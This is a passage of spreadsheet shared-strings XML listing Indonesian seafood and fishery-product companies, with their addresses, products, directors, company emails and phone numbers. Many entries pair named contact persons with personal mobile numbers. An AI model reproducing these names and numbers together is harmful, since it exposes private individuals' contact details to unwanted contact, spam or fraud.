    <t>TJOEWANDI IDRIS, SE / HP : 082146977798</t>
  </si>
  <si>
    <t>TJOEWANDI IDRIS, SE</t>
  </si>
  <si>
    <t>CV. MEGA SAMUDRA</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Transit No.9, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Daging Tuna Beku, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>Prasetio Satrio Cahyadi</t>
  </si>
  <si>
    <t>mega.samudrajkt@gmail.com</t>
  </si>
  <si>
    <t>021-6696589</t>
  </si>
  <si>
    <t>Prasetio Satrio Cahyadi 082124636325</t>
  </si>
  <si>
    <t>CV. DJOSAN</t>
  </si>
  <si>
    <t>Ruko Graha Dika Blok A 04-05, Kel. Semampir, Kec. Sedati, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>Rajungan Segar, Teripang Segar</t>
  </si>
  <si>
    <t>FEELINGGA JOHAR</t>
  </si>
  <si>
    <t>Sedati</t>
  </si>
  <si>
    <t>Semampir</t>
  </si>
  <si>
    <t>cvdjosan@gmail.com</t>
  </si>
  <si>
    <t>Feelingga 081233948685</t>
  </si>
  <si>
    <t>PT. TIMUR JAYA CEMERLANG</t>
  </si>
  <si>
    <t>Jl. Kapten Samadikun No. 34 RT 01 RW 05, Kel. Kesenden, Kec. Kejaksan, Kota Cirebon</t>
  </si>
  <si>
    <t>Siput Beku, Rajungan Beku, Cephalopoda Beku, Udang Beku, Ikan Demersal Beku, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>KIM LIM SEN</t>
  </si>
  <si>
    <t>Kejaksan</t>
  </si>
  <si>
    <t>Kesenden</t>
  </si>
  <si>
    <t>timurjayacemerlangpt@gmail.com</t>
  </si>
  <si>
    <t>0231-246082</t>
  </si>
  <si>
    <t>MUHAMMAD SYARIFUDDIN</t>
  </si>
  <si>
    <t>ANI ACHMAD</t>
  </si>
  <si>
    <t>PT. BINTANG SAMUDRA SUKSES</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Blok K No.6, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>ROSNINI</t>
  </si>
  <si>
    <t>bintangsamudrasukses@gmail.com</t>
  </si>
  <si>
    <t>021-22664197</t>
  </si>
  <si>
    <t>TARI 082114481974</t>
  </si>
  <si>
    <t>BUDI PRASETYO</t>
  </si>
  <si>
    <t>PT. SEKAR BUMI, TBK PLANT I</t>
  </si>
  <si>
    <t>Paha Kodok Beku, Ikan Hasil Budidaya Beku</t>
  </si>
  <si>
    <t>Tebel</t>
  </si>
  <si>
    <t>nikmatus@sekarbumi.com</t>
  </si>
  <si>
    <t>031- 8951910</t>
  </si>
  <si>
    <t>FREDDY ADAM</t>
  </si>
  <si>
    <t>PT. MALASINA JAYA WALET</t>
  </si>
  <si>
    <t>Jl. Raya Buncitan Dusun Duran RT 23 RW 07, Kel. Buncitan, Kec. Sedati, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>Lobster Beku, Rajungan Beku, Udang Beku, Lobster Segar, Rajungan Segar, Kepiting Segar, Ikan Demersal Beku, Cephalopoda Beku, Kepiting Beku, Ikan Demersal Segar, Udang Segar, Ikan Pelagis Segar, Kerang Beku, Keong Beku, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>SRI NANIK</t>
  </si>
  <si>
    <t>Buncitan</t>
  </si>
  <si>
    <t>mjw.srby@gmail.com</t>
  </si>
  <si>
    <t>HENDRA (081210039999)</t>
  </si>
  <si>
    <t>HENDRA</t>
  </si>
  <si>
    <t>CV. BINTANG FAHRI INTERNASIONAL</t>
  </si>
  <si>
    <t>Papua</t>
  </si>
  <si>
    <t>Jl. Ternate, Gg. H. Kasim, Kel. Merauke, Kec. Merauke, Kabupaten Merauke</t>
  </si>
  <si>
    <t>Gelembung Ikan Kering, Sirip Hiu Kering</t>
  </si>
  <si>
    <t>TAUFIK LATARISSA, S.Sos</t>
  </si>
  <si>
    <t>Merauke</t>
  </si>
  <si>
    <t>taufiklatarissa1@gmail.com</t>
  </si>
  <si>
    <t>PT. INDOKOM SAMUDRA PERSADA</t>
  </si>
  <si>
    <t>Jl. Ir. Sutami Km 12.5, Kel. Sukanegara, Kec. Tanjung Bintang, Kabupaten Lampung Selatan</t>
  </si>
  <si>
    <t>Udang Rebus Beku, Udang Mentah Beku</t>
  </si>
  <si>
    <t>H. Saimi Saleh</t>
  </si>
  <si>
    <t>Sukanegara</t>
  </si>
  <si>
    <t>herlina_wahyuni@yahoo.com</t>
  </si>
  <si>
    <t>Herlina Wahyuni 08117270717</t>
  </si>
  <si>
    <t>Ibnu Syena Alfitra</t>
  </si>
  <si>
    <t>PT. INDOMARU LESTARI</t>
  </si>
  <si>
    <t>Jl. Peternakan II No. 40, Kel. Kapuk, Kec. Cengkareng, Kota Jakarta Barat</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Salmon Beku, Ikan Demersal Beku, Telur Ikan Beku, Udang Beku, Kepiting Beku, Kerang Beku, Ikan Pelagis Beku, Salmon Segar, Telur Ikan Segar, Ikan Demersal Segar, Udang Segar, Kepiting Segar, Cephalopoda Segar, Kerang Segar, Ikan Pelagis Segar</t>
  </si>
  <si>
    <t>freddie nukraha susanto</t>
  </si>
  <si>
    <t>iml@indomaru-food.coom</t>
  </si>
  <si>
    <t>021-54351930</t>
  </si>
  <si>
    <t>Komarudin &amp; 08129889</t>
  </si>
  <si>
    <t>Aan rohanda</t>
  </si>
  <si>
    <t>PT. SEKAR LAUT, TBK</t>
  </si>
  <si>
    <t>Jl. Jenggolo II/17, Kel. Pucang, Kec. Sidoarjo, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>Kerupuk Ikan, Kerupuk Udang, Kerupuk Ikan Goreng, Kerupuk Udang Goreng, Sambal Terasi Udang, Sambal Teri</t>
  </si>
  <si>
    <t>HARRY SUNOGO</t>
  </si>
  <si>
    <t>afrischa@sekarlaut.com</t>
  </si>
  <si>
    <t>+62 31 8921605</t>
  </si>
  <si>
    <t>AFRISCHA PUSPITANINGSIH/ 081234119839</t>
  </si>
  <si>
    <t>SANDIONO</t>
  </si>
  <si>
    <t>PT. INDO AMERICAN SEAFOODS</t>
  </si>
  <si>
    <t>Jl. Ir. Sutami Km 13, Kel. Sukanegara, Kec. Tanjung Bintang, Kabupaten Lampung Selatan</t>
  </si>
  <si>
    <t>Udang Mentah Beku, Udang Berlapis Tepung Beku, Udang Bernilai Tambah Beku</t>
  </si>
  <si>
    <t>gusmarlina.lina@yahoo.com</t>
  </si>
  <si>
    <t>0721 351211</t>
  </si>
  <si>
    <t>Herlina Wahyuni / 0811 7207 717</t>
  </si>
  <si>
    <t>Abu Yazid</t>
  </si>
  <si>
    <t>CV. MANDIRI</t>
  </si>
  <si>
    <t>Jl. Raya Kalirungkut 5 Blok D-31 Komplek Ruko Rungkut Megah Raya, Kel. Kalirungkut, Kec. Rungkut, Kota Surabaya</t>
  </si>
  <si>
    <t>Sirip Hiu Kering</t>
  </si>
  <si>
    <t>DJUNAIDI</t>
  </si>
  <si>
    <t>Rungkut</t>
  </si>
  <si>
    <t>Kalirungkut</t>
  </si>
  <si>
    <t>cvmandiri00@gmail.com</t>
  </si>
  <si>
    <t>DJUMAIDI - 081234528</t>
  </si>
  <si>
    <t>PT. BANDAR NELAYAN</t>
  </si>
  <si>
    <t>Jl. Ikan Tuna IV Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar</t>
  </si>
  <si>
    <t>Tuna Beku, Tuna Segar, Ikan Pelagis Beku, Ikan Demersal Beku, Cephalopoda Beku</t>
  </si>
  <si>
    <t>Kasdi Taman</t>
  </si>
  <si>
    <t>eksporbandar@gmail.com</t>
  </si>
  <si>
    <t>0361-724738</t>
  </si>
  <si>
    <t>Bayu Widarmasto (081390067165)</t>
  </si>
  <si>
    <t>Richi Richado</t>
  </si>
  <si>
    <t>PT. PUSPITA ANUGERAH ABADI</t>
  </si>
  <si>
    <t>Komplek Tempat Pelelangan Ikan (TPI) Unit 2 RT 03 RW 03, Kel. Bendar, Kec. Juwana, Kabupaten Pati</t>
  </si>
  <si>
    <t>MURI</t>
  </si>
  <si>
    <t>Juwana</t>
  </si>
  <si>
    <t>Bendar</t>
  </si>
  <si>
    <t>muri59jaya@gmail.com</t>
  </si>
  <si>
    <t>Puspitasari &amp; 081225191234</t>
  </si>
  <si>
    <t>CV. IKANDI LAUT INDONESIA</t>
  </si>
  <si>
    <t>Jl. Raya Perancis Blok B3 No.1 RT 04 RW 08, Kel. Benda, Kec. Benda, Kota Tangerang</t>
  </si>
  <si>
    <t>Kering, Lainnya, Beku</t>
  </si>
  <si>
    <t>Ikan Asin Kering, Perut Ikan Kering, Teripang Kering, Udang Ronggeng Hidup, Kerapu Hidup, Kepiting Hidup, Lobster Hidup, Ikan Air Tawar Beku, Lobster Beku, Kepiting Beku, Udang Kering, Sirip Hiu Kering, Kulit Hiu Kering, Tulang Hiu Kering, Hiu Beku, Udang Beku, Telur Ikan Beku, Cephalopoda Beku, Tuna Beku, Ikan Pelagis Beku, Ikan Demersal Beku</t>
  </si>
  <si>
    <t>Muhammad Husin</t>
  </si>
  <si>
    <t>cvikandilautindonesia@gmail.com</t>
  </si>
  <si>
    <t>NOVRIZAL (082213592753)</t>
  </si>
  <si>
    <t>Muhammad Novrizal</t>
  </si>
  <si>
    <t>PT. DWIRA MASAGENA</t>
  </si>
  <si>
    <t>Jl. Kima Raya 1 Kav B5, Kel. Daya, Kec. Biringkanaya, Kota Makassar</t>
  </si>
  <si>
    <t>Tuna Beku, Ikan Pelagis Beku, Ikan Pelagis Segar, Ikan Demersal Beku, Ikan Demersal Segar, Tuna Segar, Cephalopoda Beku, Cephalopoda Segar</t>
  </si>
  <si>
    <t>Abdul Rajab, ST</t>
  </si>
  <si>
    <t>a_masagena@yahoo.com</t>
  </si>
  <si>
    <t>Andi Sayida Nurul Sh</t>
  </si>
  <si>
    <t>Auliel Amri</t>
  </si>
  <si>
    <t>PT. TEMPO NAGADI TRADING</t>
  </si>
  <si>
    <t>Jl. MT. Haryono No.7 RT 010 RW 006, Kel. Cawang, Kec. Kramat Jati, Kota Jakarta Timur</t>
  </si>
  <si>
    <t>Minyak Ikan</t>
  </si>
  <si>
    <t>Handojo S Muljadi</t>
  </si>
  <si>
    <t>Kramat Jati</t>
  </si>
  <si>
    <t>Cawang</t>
  </si>
  <si>
    <t>suhandi@thetempogroup.com</t>
  </si>
  <si>
    <t>021-29218888</t>
  </si>
  <si>
    <t>Suhandi - 081298176860</t>
  </si>
  <si>
    <t>Ruth Dewi Rosila Widjaja</t>
  </si>
  <si>
    <t>PT. MUNCHAR</t>
  </si>
  <si>
    <t>Jl. Sampangan, Kel. Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi</t>
  </si>
  <si>
    <t>PRAJITNO SOEROWIDJOJO</t>
  </si>
  <si>
    <t>ptmunchar.docteam@gmail.com</t>
  </si>
  <si>
    <t>0333 593274</t>
  </si>
  <si>
    <t xml:space="preserve">CHARLES PRASETYO </t>
  </si>
  <si>
    <t>RACHMAN SOEMANTRI</t>
  </si>
  <si>
    <t>PT. KANG YIH TRADING</t>
  </si>
  <si>
    <t>Jl. Raya Maspion Romokalisari 1/7 (C-07), Kel. Romokalisari, Kec. Benowo, Kota Surabaya</t>
  </si>
  <si>
    <t>HUANG PENGCONG</t>
  </si>
  <si>
    <t>Benowo</t>
  </si>
  <si>
    <t>Romokalisari</t>
  </si>
  <si>
    <t>pt.kangyih@hotmail.com</t>
  </si>
  <si>
    <t>HUANG PENGCONG &amp; 08123150009</t>
  </si>
  <si>
    <t>UD. CATHAY INDO CHITIN</t>
  </si>
  <si>
    <t>Dusun Krajan 1 RT 03 RW 05, Kel. Bangsring, Kec. Wongsorejo, Kabupaten Banyuwangi</t>
  </si>
  <si>
    <t>Lainnya, -, Reduksi</t>
  </si>
  <si>
    <t>Kolagen Ikan , Ossein, Chitin, Chitosan</t>
  </si>
  <si>
    <t>Boy Tanaya</t>
  </si>
  <si>
    <t>rich.tanaya@yahoo.com</t>
  </si>
  <si>
    <t>Rich Tanaya &amp; 082139639972</t>
  </si>
  <si>
    <t>Rich Tanaya</t>
  </si>
  <si>
    <t>CV. SUMBER LAUT ABADI</t>
  </si>
  <si>
    <t>Jl. Cemara No.184A, Kel. Pulo Brayan Darat II, Kec. Medan Timur, Kota Medan</t>
  </si>
  <si>
    <t>KADIR MANURUNG</t>
  </si>
  <si>
    <t>Medan Timur</t>
  </si>
  <si>
    <t>Pulo Brayan Darat II</t>
  </si>
  <si>
    <t>cv.sumberlautabadi@gmail.com</t>
  </si>
  <si>
    <t>Sahat H.V Manihuruk/081382217329</t>
  </si>
  <si>
    <t>Sahat H.V Manihuruk</t>
  </si>
  <si>
    <t>PT. SARI CAKALANG</t>
  </si>
  <si>
    <t>Madidir Weru Lingkungan IV, Kel. Madidir Weru, Kec. Bitung Tengah, Kota Bitung</t>
  </si>
  <si>
    <t>LANNY SONDAKH</t>
  </si>
  <si>
    <t>Bitung Tengah</t>
  </si>
  <si>
    <t>Madidir Weru</t>
  </si>
  <si>
    <t>saricakalang@yahoo.com</t>
  </si>
  <si>
    <t>0438 30585</t>
  </si>
  <si>
    <t xml:space="preserve">LANNY SONDAKH </t>
  </si>
  <si>
    <t>CV. KARYA BITUNG</t>
  </si>
  <si>
    <t>Jl. Raya Manado - Bitung, Kel. Tontalete, Kec. Kema, Kabupaten Minahasa Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Demersal Beku, Cephalopoda Beku, Bandeng Beku</t>
  </si>
  <si>
    <t>Joseph Muntu</t>
  </si>
  <si>
    <t>Kema</t>
  </si>
  <si>
    <t>Tontalete</t>
  </si>
  <si>
    <t>dayara1111@yahoo.com</t>
  </si>
  <si>
    <t>Sufiaty 085256628522</t>
  </si>
  <si>
    <t>Sufiaty</t>
  </si>
  <si>
    <t>PT. MINAMARIN BAHARI KENCANA</t>
  </si>
  <si>
    <t>Jl. Pantai Sari No.1 Komplek Techno Park Perikanan, Kel. Panjang Wetan, Kec. Pekalongan Utara, Kota Pekalongan</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Ikan Pelagis Beku, Cephalopoda Beku</t>
  </si>
  <si>
    <t xml:space="preserve">WAGIMAN TANTO </t>
  </si>
  <si>
    <t>Pekalongan Utara</t>
  </si>
  <si>
    <t>Panjang Wetan</t>
  </si>
  <si>
    <t>rama.annisa10@gmail.com</t>
  </si>
  <si>
    <t>08121548873 / 085742132893</t>
  </si>
  <si>
    <t xml:space="preserve">DRS. EDDY PURNOMO </t>
  </si>
  <si>
    <t xml:space="preserve"> WAGIMAN TANTO</t>
  </si>
  <si>
    <t>Dusun Sibaganding, Kel. Janggir Leto, Kec. Panei, Kabupaten Simalungun</t>
  </si>
  <si>
    <t>Ikan Air Tawar Beku, Ikan Demersal Beku, Ikan Air Tawar Bernilai Tambah Beku</t>
  </si>
  <si>
    <t>Ardi Budhiono</t>
  </si>
  <si>
    <t>Panei</t>
  </si>
  <si>
    <t>Janggir Leto</t>
  </si>
  <si>
    <t>ahmadtafrizi@gmail.com</t>
  </si>
  <si>
    <t>0622-7233033</t>
  </si>
  <si>
    <t>Ahmad Tafrizi &amp; 085280151100 (WA)</t>
  </si>
  <si>
    <t>Imam Santoso</t>
  </si>
  <si>
    <t>PT. ALGALINDO PERDANA</t>
  </si>
  <si>
    <t>Jl. Pelem, Kel. Bulusari, Kec. Gempol, Kabupaten Pasuruan</t>
  </si>
  <si>
    <t>Tepung Karagenan</t>
  </si>
  <si>
    <t>JOHANES SUKANTIO</t>
  </si>
  <si>
    <t>Bulusari</t>
  </si>
  <si>
    <t>algalindop@yahoo.com</t>
  </si>
  <si>
    <t>0343-851393</t>
  </si>
  <si>
    <t>Iqbal 085335442263</t>
  </si>
  <si>
    <t>PT. INNI PIONEER FOOD INDUSTRY</t>
  </si>
  <si>
    <t>Jl. Desa Gintungkerta, Kel. Gintungkerta, Kec. Klari, Kabupaten Karawang</t>
  </si>
  <si>
    <t>Bekicot Kaleng</t>
  </si>
  <si>
    <t>Wu Tien Shih</t>
  </si>
  <si>
    <t>Klari</t>
  </si>
  <si>
    <t>Gintungkerta</t>
  </si>
  <si>
    <t>innipkrw@gmail.com</t>
  </si>
  <si>
    <t>yanto081219002025</t>
  </si>
  <si>
    <t>Yanto, ST</t>
  </si>
  <si>
    <t>PT. ALAM RAYA SURYA INDAH</t>
  </si>
  <si>
    <t>Jl. Pergudangan Mutiara Kosambi I Blok A2 No. 8, Kel. Kosambi, Kec. Kosambi, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>CINDY JENNIFER</t>
  </si>
  <si>
    <t>pt.arsi9@gmail.com</t>
  </si>
  <si>
    <t>FRANDY JOE &amp; 08161458777</t>
  </si>
  <si>
    <t>FRANDY JOE</t>
  </si>
  <si>
    <t>ALANG ALANG TUMBUH SUBUR</t>
  </si>
  <si>
    <t>Dk. Ringinsari RT 03 RW 02, Kel. Randusari, Kec. Teras, Kabupaten Boyolali</t>
  </si>
  <si>
    <t>Abon Ikan</t>
  </si>
  <si>
    <t>TRI WAHYUNI</t>
  </si>
  <si>
    <t>Teras</t>
  </si>
  <si>
    <t>Randusari</t>
  </si>
  <si>
    <t>fisherraonline@gmail.com</t>
  </si>
  <si>
    <t>0276-3293862</t>
  </si>
  <si>
    <t>Tri 08156757003</t>
  </si>
  <si>
    <t>CV. SURYA BLAMBANGAN KENCANA</t>
  </si>
  <si>
    <t>Jl. Sampangan No.9A, Kel. Kedungrejo, Kec. Muncar, Kabupaten Banyuwangi</t>
  </si>
  <si>
    <t>YULIA PUJIASTUTIK</t>
  </si>
  <si>
    <t>suryablambangan@gmail.com</t>
  </si>
  <si>
    <t>0333-592203/ 0333-590106</t>
  </si>
  <si>
    <t>NANIK 085258834248</t>
  </si>
  <si>
    <t>PT. HARMONI SAMUDRA PERKASA</t>
  </si>
  <si>
    <t>Jl. Daeng Salili No.17A RT 01 RW 01, Kel. Kampung Bugis, Kec. Tanjungpinang Kota, Kota Tanjung Pinang</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Cephalopoda Segar, Ikan Demersal Beku, Ikan Demersal Segar, Ikan Pelagis Beku, Ikan Pelagis Segar</t>
  </si>
  <si>
    <t>JOHANES</t>
  </si>
  <si>
    <t>Tanjungpinang Kota</t>
  </si>
  <si>
    <t>Kampung Bugis</t>
  </si>
  <si>
    <t>harmoni.sp@yahoo.com</t>
  </si>
  <si>
    <t>ARINA</t>
  </si>
  <si>
    <t>PT. ACEH LAMPULO JAYA BAHARI</t>
  </si>
  <si>
    <t>Jl. Sisingamangaraja Ujung No.16, Kel. Lampulo, Kec. Kuta Alam, Kota Banda Aceh</t>
  </si>
  <si>
    <t>Husin Pratama</t>
  </si>
  <si>
    <t>rosaniocha45@gmail.com</t>
  </si>
  <si>
    <t>0651 8010220</t>
  </si>
  <si>
    <t>Putri Luqyana/082388461237</t>
  </si>
  <si>
    <t>Bun Lui</t>
  </si>
  <si>
    <t>PT. HONG 777</t>
  </si>
  <si>
    <t>Pergudangan Mutiara Kosambi I Blok A2 No.7, Kel. Kosambi Timur, Kec. Kosambi, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>pt.hong7779@gmail.com</t>
  </si>
  <si>
    <t>FRANDY JOE &amp; 0816145</t>
  </si>
  <si>
    <t>PT. DPO INDONESIA</t>
  </si>
  <si>
    <t>Komplek Duta Indah Iconic Unit C 41 - 42, Jl. MH Thamrin Kebon Nanas RT 004 RW 002, Kel. Panunggangan Utara, Kec. Pinang, Kota Tangerang</t>
  </si>
  <si>
    <t>DANIEL WILLEM L PANS</t>
  </si>
  <si>
    <t>Pinang</t>
  </si>
  <si>
    <t>Panunggangan Utara</t>
  </si>
  <si>
    <t>nova.s@dpointernational.com</t>
  </si>
  <si>
    <t>021-29866712</t>
  </si>
  <si>
    <t>NOVA 081513341245</t>
  </si>
  <si>
    <t>INNEKE</t>
  </si>
  <si>
    <t>PT. BINTAN INTAN GEMILANG</t>
  </si>
  <si>
    <t>Jl. Perikanan Barek Motor No.58 RT 003 RW 008, Kel. Kijang Kota, Kec. Bintan Timur, Kabupaten Bintan</t>
  </si>
  <si>
    <t>Fillet Ikan Segar, Fillet Ikan Beku, Udang Beku, Udang Segar, Cephalopoda Segar, Cephalopoda Beku</t>
  </si>
  <si>
    <t>DINARIA</t>
  </si>
  <si>
    <t>bigcoldstorage@gmail.com</t>
  </si>
  <si>
    <t>0771-61131</t>
  </si>
  <si>
    <t>DEDI SIPAKKAR 081375670086</t>
  </si>
  <si>
    <t>DEDI SIPAKKAR</t>
  </si>
  <si>
    <t>CV. ADI JAYA MANDIRI</t>
  </si>
  <si>
    <t>Blok Sirawa RT 001 RW 005, Kel. Grogol, Kec. Gunung Jati, Kabupaten Cirebon</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Demersal Beku, Bandeng Beku, Cephalopoda Beku</t>
  </si>
  <si>
    <t>ADI SIONAL WIJAYA</t>
  </si>
  <si>
    <t>cvadijayamandiri@yahoo.com</t>
  </si>
  <si>
    <t>ADI SIONAL WIJAYA 08</t>
  </si>
  <si>
    <t>CV. CAHAYA SEJAHTERA</t>
  </si>
  <si>
    <t>Jl. P. Nusa Barung Komp Niaga Malindo No.3A KIM I, Kel. Mabar, Kec. Medan Deli, Kota Medan</t>
  </si>
  <si>
    <t>Cacing Laut Kering, Ikan Kering, Tulang Ikan Kering, Perut Ikan Kering, Kulit Ikan Kering , Sirip Hiu Kering, Teripang Kering, Udang Kering</t>
  </si>
  <si>
    <t>Charles</t>
  </si>
  <si>
    <t>sejahtera_cahaya@yahoo.com</t>
  </si>
  <si>
    <t>Charles 085261191968</t>
  </si>
  <si>
    <t>PT. NELAYAN MINA LESTARI</t>
  </si>
  <si>
    <t>Jl. Hang Tuah No.79, Kel. Bajomulyo, Kec. Juwana, Kabupaten Pati</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Demersal Beku, Fillet Ikan Beku</t>
  </si>
  <si>
    <t>PEMEGANG SAHAM</t>
  </si>
  <si>
    <t>Bajomulyo</t>
  </si>
  <si>
    <t>pt.nelayanminalestari@gmail.com</t>
  </si>
  <si>
    <t>0295-473242</t>
  </si>
  <si>
    <t>H. SUPENO</t>
  </si>
  <si>
    <t>CV. BAHARI LESTARINDO</t>
  </si>
  <si>
    <t>Jl. Rajawali No.11 RT 006 RW 003, Kel. Punggul, Kec. Gedangan, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>SUSANTO</t>
  </si>
  <si>
    <t xml:space="preserve">Punggul </t>
  </si>
  <si>
    <t>blestarindo@yahoo.com</t>
  </si>
  <si>
    <t>WILDAN HILMI Z A &amp; 081334030133</t>
  </si>
  <si>
    <t>PT. ANEKA SUMBER TATA BAHARI</t>
  </si>
  <si>
    <t>Jl. Hurnala II, Kel. Tulehu, Kec. Salahutu, Kabupaten Maluku Tengah</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Tuna Beku, Tuna Loin Beku, Daging Perut Tuna Beku</t>
  </si>
  <si>
    <t>Halil Lauhatta</t>
  </si>
  <si>
    <t>astbtlh1994@gmail.com</t>
  </si>
  <si>
    <t>Rahmad Okta Priadi / 082122322880</t>
  </si>
  <si>
    <t>PT. ASAHAN HASIL LAUT</t>
  </si>
  <si>
    <t>Jl. Garuda Lk II, Kel. Beting Kuala Kapias, Kec. Teluk Nibung, Kota Tanjung Balai</t>
  </si>
  <si>
    <t>Udang Beku, Ikan Pelagis Beku, Ikan Demersal Beku, Cephalopoda Beku, Kepiting Beku, Kerang Beku</t>
  </si>
  <si>
    <t>Linda Cenderawasih</t>
  </si>
  <si>
    <t>asahanhasillaut@yahoo.com</t>
  </si>
  <si>
    <t>Surya Abadi 081361581758</t>
  </si>
  <si>
    <t>Surya Abadi</t>
  </si>
  <si>
    <t>PT. URCHINDIZE INDONESIA</t>
  </si>
  <si>
    <t>Desa Bandengan RT 006 RW 002, Kec. Jepara, Kabupaten Jepara</t>
  </si>
  <si>
    <t>Ikan Kering, Udang Rebon Kering</t>
  </si>
  <si>
    <t>KENJI KUSUMA</t>
  </si>
  <si>
    <t>Jepara</t>
  </si>
  <si>
    <t>Bandengan</t>
  </si>
  <si>
    <t>ilham@urchindize.com</t>
  </si>
  <si>
    <t>ILHAM KURNIANTORO &amp; 085225453670</t>
  </si>
  <si>
    <t>ILHAM KURNIANTORO</t>
  </si>
  <si>
    <t>PT. BEHN MEYER CHEMICALS</t>
  </si>
  <si>
    <t>Taman Tekno BSD Industrial Komplek Sektor XI, Jl. Tekno Utama Blok B No.1, Kel. Setu, Kec. Setu, Kota Tangerang Selatan</t>
  </si>
  <si>
    <t>Kering, Reduksi</t>
  </si>
  <si>
    <t>Flakes Rumput Laut, Tepung Karagenan</t>
  </si>
  <si>
    <t>BEHN MEYER CHEMICALS</t>
  </si>
  <si>
    <t>Setu</t>
  </si>
  <si>
    <t>bmk@behnmeyer.co.id</t>
  </si>
  <si>
    <t>021-7565000</t>
  </si>
  <si>
    <t>Nur Handayanai (08159041062)</t>
  </si>
  <si>
    <t>Teddy Candinegara</t>
  </si>
  <si>
    <t>SEMANGAT BARU</t>
  </si>
  <si>
    <t>Jl. Garuda LK IV, Kel. Beting Kuala Kapias, Kec. Teluk Nibung, Kota Tanjung Balai</t>
  </si>
  <si>
    <t>Udang Segar, Kepiting Segar, Kerang Segar, Cephalopoda Segar, Ikan Pelagis Segar, Ikan Demersal Segar, Cephalopoda Beku, Udang Kering</t>
  </si>
  <si>
    <t>Paiman</t>
  </si>
  <si>
    <t>semangatbaru888@yahoo.com</t>
  </si>
  <si>
    <t>EDI 085373082134</t>
  </si>
  <si>
    <t>PT. BERKAH HASIL NUSANTARA</t>
  </si>
  <si>
    <t>Komplek PPS Kendari Jl. Tuna 5, Kel. Puday, Kec. Abeli, Kota Kendari</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Pelagis Beku, Ikan Demersal Beku, Tuna Beku</t>
  </si>
  <si>
    <t>Rachmat Hidajat</t>
  </si>
  <si>
    <t>bhnkdi@hotmail.com</t>
  </si>
  <si>
    <t>Misbahul Munir/081349554225</t>
  </si>
  <si>
    <t>PT. GALIC ARTABAHARI</t>
  </si>
  <si>
    <t>Kp. Cikedokan RT 002 RW 001, Kel. Sukadanau, Kec. Cikarang Barat, Kabupaten Bekasi</t>
  </si>
  <si>
    <t>Semi Refined Carrageenan</t>
  </si>
  <si>
    <t>Fifi H Gani</t>
  </si>
  <si>
    <t>Sukadanau</t>
  </si>
  <si>
    <t>sales@ptgab.com</t>
  </si>
  <si>
    <t>Thomas Ferdinand</t>
  </si>
  <si>
    <t>PT. CANDI JAYA AMERTA</t>
  </si>
  <si>
    <t>Jl. Raya Tanggulangin No.36, Kel. Kalitengah, Kec. Tanggulangin, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>Kerupuk Udang, Kerupuk Ikan, Kerupuk Campuran Ikan dan Udang</t>
  </si>
  <si>
    <t>ROOSILAWATI HASIM DJAYA</t>
  </si>
  <si>
    <t>Kalitengah</t>
  </si>
  <si>
    <t>candijaya2@gmail.com</t>
  </si>
  <si>
    <t>031-8963707</t>
  </si>
  <si>
    <t>ALIK NURACHMAWATI,S.TP/081331270198</t>
  </si>
  <si>
    <t>DENNY WIBISONO</t>
  </si>
  <si>
    <t>PT. OCEAN PARADISE FISHERY</t>
  </si>
  <si>
    <t>Jl. Poros Limunjan Gg. Sulawesi RT 019, Kel. Sambaliung, Kec. Sambaliung, Kabupaten Berau</t>
  </si>
  <si>
    <t>Udang Beku, Ikan Demersal Beku</t>
  </si>
  <si>
    <t>YUNITA</t>
  </si>
  <si>
    <t>Sambaliung</t>
  </si>
  <si>
    <t>rosidasari.opf@gmail.com</t>
  </si>
  <si>
    <t>YUNITA/08112789806</t>
  </si>
  <si>
    <t>PT. CIPTA PREMIO INDONESIA</t>
  </si>
  <si>
    <t>Jl. Raya Lintas Selatan RT 01 RW 01, Kel. Tasikmadu, Kec. Watulimo, Kabupaten Trenggalek</t>
  </si>
  <si>
    <t>Fillet Patin Beku, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>MOH. RYAN TULLUS</t>
  </si>
  <si>
    <t>dkptrenggalek@yahoo.com</t>
  </si>
  <si>
    <t>HARTOYO</t>
  </si>
  <si>
    <t>PT. SUMBER SAMUDERA INDONESIA</t>
  </si>
  <si>
    <t>Kawasan Industri Terboyo Blok F No.16A, Kel. Trimulyo, Kec. Genuk, Kabupaten Semarang</t>
  </si>
  <si>
    <t>Bandeng Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Cephalopoda Beku, Kepiting Beku, Tuna Beku, Tuna Loin Beku, Kerang Beku, Sidat Beku, Udang Beku, Hiu Beku, Keong Beku, Lobster Beku</t>
  </si>
  <si>
    <t>Chen Qingan</t>
  </si>
  <si>
    <t>ptssi_semarang@yahoo.com</t>
  </si>
  <si>
    <t>024-76450877</t>
  </si>
  <si>
    <t>Galuh 085725049854 / (024) 76450877</t>
  </si>
  <si>
    <t>Zhang Riri</t>
  </si>
  <si>
    <t>PT. GALESONG</t>
  </si>
  <si>
    <t>Jl. Baso Dg. Bella No. 8, Kel. Kalukuang, Kec. Galesong, Kabupaten Takalar</t>
  </si>
  <si>
    <t>Telur Ikan Terbang Kering</t>
  </si>
  <si>
    <t>FENNY KONGUASA</t>
  </si>
  <si>
    <t>Galesong</t>
  </si>
  <si>
    <t>Kalukuang</t>
  </si>
  <si>
